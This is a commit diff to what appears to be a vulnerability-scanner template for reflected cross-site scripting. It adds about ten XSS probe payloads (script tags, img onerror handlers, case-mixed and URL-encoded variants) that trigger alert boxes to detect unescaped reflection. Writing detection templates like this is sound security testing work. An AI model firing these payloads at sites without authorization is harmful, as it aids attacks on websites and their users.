Update reflected-xss.yaml

dast/vulnerabilities/xss/reflected-xss.yaml

@@ -2,7 +2,7 @@ id: reflected-xss
 
 info:
   name: Reflected Cross Site Scripting
-  author: pdteam
+  author: pdteam, 0xKayala
   severity: medium
   tags: xss,rxss,dast
 
@@ -18,6 +18,16 @@ http:
     payloads:
       reflection:
         - "'\"><{{first}}"
+        - "<img src=x onerror=alert({{first}})>"
+        - "<script>alert({{first}})</script>"
+        - "'><ScRiPt>alert({{first}})</sCrIpT>"
+        - "</script><ScRiPt>alert({{first}})</sCrIpT>"
+        - "</script><script>alert({{first}})</script>"
+        - "<body onload=alert({{first}})>"
+        - "<marquee><img src=x onerror=confirm({{first}})></marquee>"
+        - "'><img%20src=xxx:x%20\x20onerror=javascript:alert({{first}})>"
+        - "'\/><img%20s+src+c=x%20on+onerror+%20="alert({{first}})"\>"
+        - "'%3e%3cscript%3ealert({{first}}*{{first}})%3c%2fscript%3eejj4sbx5w4o"
 
     fuzzing:
       - part: query
@@ -38,4 +48,4 @@ http:
         part: header
         words:
           - "text/html"
-# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950